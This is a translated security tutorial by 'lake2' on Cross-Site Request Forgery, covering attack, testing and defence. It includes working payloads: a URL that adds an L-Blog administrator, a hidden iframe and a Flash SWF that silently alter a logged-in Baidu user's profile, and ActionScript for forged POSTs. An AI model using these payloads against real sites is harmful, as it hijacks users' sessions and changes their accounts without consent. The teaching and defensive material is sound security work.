CSRF - Attack and Defense
Author: lake2
0x01 What is a CSRF attack

CSRF is short for Cross-Site Request Forgery (also written XSRF): performing a GET or POST against some CGI inside a user's existing session, for an operation the user neither knows about nor wants. In effect it lets you hijack the user's HTTP session.

Websites use cookies to identify users. Once a user has authenticated, the browser holds a cookie that identifies that user, and until the user closes the browser or logs out, every request to that site carries the cookie. If, during that period, someone else can make the browser request a URL on the site, a function the user never intended to run (such as modifying personal data) may be executed. Because this is not a request the user really meant to send, it is called request forgery; and because such requests can also be submitted from a third-party site, it picked up the "cross-site" prefix.

For example, on a BBS that lets you embed images, put the Logout link into the image URL. Everyone who views the post requests the Logout link with their own identity. From the user's point of view there is merely a broken "image" in the post and no wish to log out, but the program believes the user asked to log out and destroys the session. That is the legendary CSRF attack.

Don't underestimate CSRF. I remember L-Blog once had a CSRF vulnerability (I didn't know the concept at the time :P): a single link like http://localhost/L-blog/admincp.asp?Action=Member&type=editmem&memid=2&memtype=supadmin adds an administrator. There was also the Google CSRF vulnerability [1], which leaked email. And don't think only XSS can produce worms; given the right conditions, CSRF can too.
0x02 Where do threats come from?

An embedded image only gives you a GET request; in many cases we need to forge a POST. One option is to use an XSS on the target site, but the target may not have one, in which case we launch the attack from a third-party site.

For example, to attack a blog with such a flaw, I leave a comment on it containing a link to lure the owner into clicking it (this depends on your social-engineering skills :P); the linked page holds an HTML form that submits the data.

Tabbed browsers make this easier.

Tabbed browsers (Firefox, Maxthon, MyIE, ...) bring convenience, but also a problem: a newly opened tab shares all of the current sessions. That is, if I log in to my blog with IE and then start a second IE process to read the news, the sessions of the two IE windows are independent, and a request sent from the second IE to the blog carries no login cookie. A tabbed browser, however, runs as a single process in which every tab shares the same sessions, so a request sent to the blog from any tab carries the cookie I logged in with. (That per-process isolation was a quirk of old IE; modern browsers share cookies across every window and tab of a profile, so the shared-session case is now the norm.)

Think about it: when we click a link someone else left in a blog, BBS or webmail, a carefully prepared CSRF attack may be waiting for us.
0x03 Launching a CSRF attack

To launch a CSRF POST from a third-party site, use JavaScript to automatically submit a form to the target CGI. Writing a form by hand every time is inconvenient, so there are helper tools: XSS Post Forwarder [2] and CSRF Redirector [3]; I also wrote an ASP version [4]. You only pass it the target URL and the parameters to submit, and it automatically POSTs them to the target.

For example, to submit some data to www.0x54.org/a.asp: http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://www.0x54.org/a.asp&a=123&b=321&c=%26%23%25 (the parameter values must be URL-encoded).

Then you have to think about how to trick users into visiting our page.
0x04 An instance

Since CSRF is not as eye-catching as XSS, it is still very easy to find a web application with CSRF. This time our target is Baidu, just for a test.

By whatever means, get a user who is logged in to Baidu to request this URL: http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=[email protected]&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B

Then check whether that person's profile has changed. One thing is a little annoying: when the victim requests the URL, the browser navigates to the "data changed successfully" page, and we are discovered. Is there a way to keep the browser from showing it?

Yes.

One way is to wrap it in an IFRAME: <iframe width="0" height="0" src="http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=[email protected]&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B"></iframe>
Another way is to use Flash.

0x05 CSRF with Flash

Flash can submit data to an arbitrary URL. Open Adobe Flash CS3 Professional, create a new Flash file (ActionScript 3.0), right-click the first frame of the default layer, choose Actions, and add the following code:

    import flash.net.URLRequest;
    import flash.net.URLVariables;
    import flash.net.URLRequestMethod;
    import flash.net.sendToURL;

    // Target the POST is sent to (the author's own test server here).
    var url:URLRequest = new URLRequest("http://www.0x54.org/lake2");
    // Body of the POST; URLVariables can be built directly from a query string.
    var lake:URLVariables = new URLVariables("a=lake2");
    url.method = URLRequestMethod.POST;
    url.data = lake;
    // Fire-and-forget: the browser attaches the user's cookies for the target host.
    sendToURL(url);
    stop();

Export it as an SWF, open it in the browser, and capture the packets to see the effect: http://www.0x54.org/lake2/flash/test1.html
Writing ActionScript and compiling an SWF every time is troublesome, so, following the CSRF Redirector idea, I wrote a similar generic Flash program [5] and tried it against Baidu. The web page embeds it with HTML like this: <embed src="http://www.0x54.org/lake2/flash/flash_hacking.swf?f=1&t=[email protected]%26sdv%3D%26zodiac%3D0%26birth_year%3D0%26birth_month%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs2%3D%25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B%26b%253Drs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE%25DE%26txt_rs%3D%26reside_site%3D%253B%253B"></embed> (note that the parameters are URL-encoded twice: once for the SWF's query string and once more for the target).

In fact, Flash can also read the response. If it contains sensitive information, the SWF can read it and send it to a server we control. Whether this works depends on whether the target site lets Flash from another domain read its content, which Flash Player decides from the target's crossdomain.xml policy file.
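To check the "does the target allow cross-domain reads" condition above, here is an added example (written for this edit, not part of the article) that parses a crossdomain.xml policy and decides whether a SWF served from a given origin could read the target's responses. The policy texts and hostnames are constructed for the example; the matching rules (the `*` and `*.domain` patterns, and the `secure` attribute, which defaults to true and keeps http:// SWFs from reading https:// responses) follow the published Flash Player policy-file behaviour.

```javascript
// Added example, not from the article: evaluate a crossdomain.xml policy the way
// a tester does before trying the Flash read-back attack of 0x05.

// Extract every <allow-access-from> rule (domain pattern plus secure flag).
function parseCrossdomainPolicy(xml) {
  const rules = [];
  const tagRe = /<allow-access-from\b([^>]*)\/?>/gi;
  let m;
  while ((m = tagRe.exec(xml)) !== null) {
    const attrs = m[1];
    const domain = /domain\s*=\s*"([^"]*)"/i.exec(attrs);
    const secure = /secure\s*=\s*"([^"]*)"/i.exec(attrs);
    if (domain) {
      rules.push({
        domain: domain[1].toLowerCase(),
        // secure="false" lets an http:// SWF read https:// responses; default is true.
        secure: secure ? secure[1].toLowerCase() !== "false" : true,
      });
    }
  }
  return rules;
}

// Does one domain pattern ("*", "*.example.com", "www.example.com") match a host?
// "*.example.com" matches example.com itself and any subdomain, but not evilexample.com.
function domainMatches(pattern, host) {
  host = host.toLowerCase();
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) {
    return host === pattern.slice(2) || host.endsWith(pattern.slice(1));
  }
  return host === pattern;
}

// Could a SWF loaded from swfOrigin read responses from a target whose policy
// is `xml`? targetIsHttps says whether the target URL is https.
function flashCanReadCrossDomain(xml, swfOrigin, targetIsHttps) {
  const { protocol, hostname } = new URL(swfOrigin);
  return parseCrossdomainPolicy(xml).some((rule) => {
    if (!domainMatches(rule.domain, hostname)) return false;
    // An https target with secure="true" (the default) is only readable by https SWFs.
    if (targetIsHttps && rule.secure && protocol !== "https:") return false;
    return true;
  });
}

// Rate a policy: "*" means any site on the internet can read authenticated
// responses, the worst case for the attack described in 0x05.
function ratePolicy(xml) {
  const rules = parseCrossdomainPolicy(xml);
  if (rules.length === 0) return "closed";
  if (rules.some((r) => r.domain === "*")) return "open-to-everyone";
  if (rules.some((r) => r.domain.startsWith("*."))) return "open-to-subdomains";
  return "allow-listed";
}

// Constructed sample policies (hostnames are hypothetical).
const OPEN_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>`;

const SUBDOMAIN_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.example.com" secure="false"/>
</cross-domain-policy>`;

function demo() {
  console.log(ratePolicy(OPEN_POLICY), flashCanReadCrossDomain(OPEN_POLICY, "http://evil.test", false));
  console.log(ratePolicy(SUBDOMAIN_POLICY), flashCanReadCrossDomain(SUBDOMAIN_POLICY, "http://evilexample.com", false));
}
demo();
```

The wide-open policy is the one to look for during testing; note that even with `domain="*"`, an http-hosted SWF cannot read an https target unless the policy also sets `secure="false"`.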
0x06 Testing for CSRF

Checking for a CSRF vulnerability is manual work: capture a normal request, remove the Referer field, and resubmit it. If it is still accepted, there is most likely a problem. Of course, the parameters may contain values that cannot be predicted (a userid, for example); then it depends on whether those values can be obtained by other means, such as Flash. If they can, the problem remains. Also try changing POST to GET, because some programs do not distinguish between the two.

Because applications differ in function and in response format, automated testing for CSRF is somewhat difficult. OWASP's CSRFTester tool [6] is worth a try.
0x07 Defending against CSRF

Web applications generally defend against CSRF with a Referer check, a token, or a CAPTCHA. The article by Nexus [7] covers this thoroughly, and superhei has proposed bypass ideas [8]; see their articles.

Another approach is to defend on the client side: there seems to be software similar to HttpWatch that sits in the browser and can intercept or filter cookies on cross-domain requests. (Modern browsers build this idea in: a cookie marked SameSite=Lax or SameSite=Strict is not attached to cross-site POSTs, image loads or iframe loads such as the ones used above.)
0x08 Summary
I hope this article helps you. You are also welcome to discuss it with me: [email protected]
[Reference]
[1] Google Gmail e-mail hijack technique, http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
[2] XSS Post Forwarder, http://whiteacid.org/misc/xss_post_forwarder.php
[3] CSRF Redirector, http://shiflett.org/blog/2007/jul/csrf-redirector
[4] ASP XSS Post Forwarder download (comes with an HTML version), http://www.0x54.org/lake2/xss_post_forwarder.zip
[5] Source code and compiled SWF download, http://www.0x54.org/lake2/flash/flash_hacking.rar
[6] OWASP CSRFTester, http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project
[7] Preventing CSRF, http://www.playhack.net/view.php? (English version: http://www.hanguofeng.cn/archives/security/preventing-csrf)
[8] Bypass Preventing CSRF, http://www.xfocus.net/articles/200801/964.html